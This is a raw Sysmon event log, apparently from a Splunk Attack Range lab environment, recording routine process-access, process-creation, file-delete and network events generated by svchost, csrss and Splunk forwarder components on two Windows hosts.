07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.598{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA6F08FCA467E7DF2FBE19F428623EF9,SHA256=98E9725350076A0E7897024DDAA6F9A3AB2B4D10A076655352BB27218242CA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6423D47DA0DD9DEAD78CCF4BD5BF2B7,SHA256=916354ED5C160319356B1DF2EFD639E6CE8D026AFDD3DF0E64173B0B56CE3CB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:16.787{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50968-false10.0.1.12-8000- 23542300x80000000000000001047369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51D4DFE4A0A62860FFA97E2D1E551196,SHA256=E450E3F967D1CA36A2405A4AEF59C024D7172D3DBD77955042664129DD55F3F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.973{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.973{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.598{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA6F08FCA467E7DF2FBE19F428623EF9,SHA256=98E9725350076A0E7897024DDAA6F9A3AB2B4D10A076655352BB27218242CA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BD6C3FD477B33222C0D0E902A6764C,SHA256=C6E99615B759F1F4FF81F0B6801DCFA24B554CD4A84668F6143E62AEDED9D3DB,IMPHASH=00000000000000000000000000000000falsetrue 
